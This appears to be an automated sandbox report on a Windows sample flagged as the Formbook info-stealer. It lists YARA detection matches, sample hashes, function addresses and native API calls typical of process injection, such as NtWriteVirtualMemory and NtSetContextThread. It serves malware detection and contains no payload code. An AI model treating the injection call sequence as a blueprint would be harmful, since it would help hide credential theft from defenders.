          Source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe PID: 6908, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe PID: 5416, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: rundll32.exe PID: 6192, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.430843859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.911001855.0000000000E70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.911590172.0000000004B50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.911556119.0000000004B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.435031678.0000000003EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe PID: 6908, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exe PID: 5416, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: rundll32.exe PID: 6192, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 0_2_0125C8840_2_0125C884
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 0_2_0125ECA10_2_0125ECA1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 0_2_0125ECB00_2_0125ECB0
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeCode function: 9_2_02E0C8849_2_02E0C884
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeCode function: 9_2_02E0ECA19_2_02E0ECA1
          Source: C:\Users\user\AppData\Roaming\hkkRsa.exeCode function: 9_2_02E0ECB09_2_02E0ECB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0041E87910_2_0041E879
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0041E00910_2_0041E009
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0040102610_2_00401026
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0040103010_2_00401030
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0041E11110_2_0041E111
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0041E1A110_2_0041E1A1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0041E46110_2_0041E461
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0041DD8210_2_0041DD82
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_00402D8710_2_00402D87
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_00402D9010_2_00402D90
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_00409E5B10_2_00409E5B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_00409E6010_2_00409E60
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0041D67D10_2_0041D67D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0041EF0910_2_0041EF09
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0041D7AE10_2_0041D7AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_00402FB010_2_00402FB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018099BF10_2_018099BF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180412010_2_01804120
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018120A010_2_018120A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B20A810_2_018B20A8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B28EC10_2_018B28EC
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E680010_2_017E6800
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A100210_2_018A1002
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018BE82410_2_018BE824
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A83010_2_0180A830
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FB09010_2_017FB090
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0188EB8A10_2_0188EB8A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181138B10_2_0181138B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180EB9A10_2_0180EB9A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181EBB010_2_0181EBB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A03DA10_2_018A03DA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018ADBD210_2_018ADBD2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181ABD810_2_0181ABD8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018923E310_2_018923E3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01838BE810_2_01838BE8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180A30910_2_0180A309
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A231B10_2_018A231B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B2B2810_2_018B2B28
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180AB4010_2_0180AB40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0188CB4F10_2_0188CB4F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180336010_2_01803360
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B32A910_2_018B32A9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B22AE10_2_018B22AE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018AE2C510_2_018AE2C5
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A4AEF10_2_018A4AEF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0189FA2B10_2_0189FA2B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B23610_2_0180B236
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0181258110_2_01812581
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A2D8210_2_018A2D82
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018165A010_2_018165A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B25DD10_2_018B25DD
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017E0D2010_2_017E0D20
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B2D0710_2_018B2D07
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017FD5E010_2_017FD5E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01802D5010_2_01802D50
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B1D5510_2_018B1D55
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A449610_2_018A4496
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_017F841F10_2_017F841F
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018AD46610_2_018AD466
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180B47710_2_0180B477
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018BDFCE10_2_018BDFCE
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018A67E210_2_018A67E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B1FF110_2_018B1FF1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01891EB610_2_01891EB6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018B2EF710_2_018B2EF7
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0180560010_2_01805600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018AD61610_2_018AD616
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01806E3010_2_01806E30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: String function: 017EB150 appears 154 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: String function: 01875720 appears 65 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: String function: 0183D08C appears 42 times
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0041A370 NtCreateFile,10_2_0041A370
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0041A420 NtReadFile,10_2_0041A420
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0041A4A0 NtClose,10_2_0041A4A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0041A550 NtAllocateVirtualMemory,10_2_0041A550
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0041A41A NtReadFile,10_2_0041A41A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0041A49C NtClose,10_2_0041A49C
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829860 NtQuerySystemInformation,LdrInitializeThunk,10_2_01829860
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018296E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_018296E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_01829660
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018299A0 NtCreateSection,10_2_018299A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018299D0 NtCreateProcessEx,10_2_018299D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829910 NtAdjustPrivilegesToken,10_2_01829910
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829950 NtQueueApcThread,10_2_01829950
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018298A0 NtWriteVirtualMemory,10_2_018298A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018298F0 NtReadVirtualMemory,10_2_018298F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829820 NtEnumerateKey,10_2_01829820
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829840 NtDelayExecution,10_2_01829840
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0182B040 NtSuspendThread,10_2_0182B040
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0182A3B0 NtGetContextThread,10_2_0182A3B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829B00 NtSetValueKey,10_2_01829B00
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829A80 NtOpenDirectoryObject,10_2_01829A80
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829A00 NtProtectVirtualMemory,10_2_01829A00
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829A10 NtQuerySection,10_2_01829A10
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829A20 NtResumeThread,10_2_01829A20
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829A50 NtCreateFile,10_2_01829A50
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018295D0 NtClose,10_2_018295D0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018295F0 NtQueryInformationFile,10_2_018295F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829520 NtWaitForSingleObject,10_2_01829520
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0182AD30 NtSetContextThread,10_2_0182AD30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829540 NtReadFile,10_2_01829540
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829560 NtWriteFile,10_2_01829560
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829780 NtMapViewOfSection,10_2_01829780
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_018297A0 NtUnmapViewOfSection,10_2_018297A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829FE0 NtCreateMutant,10_2_01829FE0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_01829710 NtQueryInformationToken,10_2_01829710
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.11935.10916.exeCode function: 10_2_0182A710 NtOpenProcessToken,10_2_0182A710
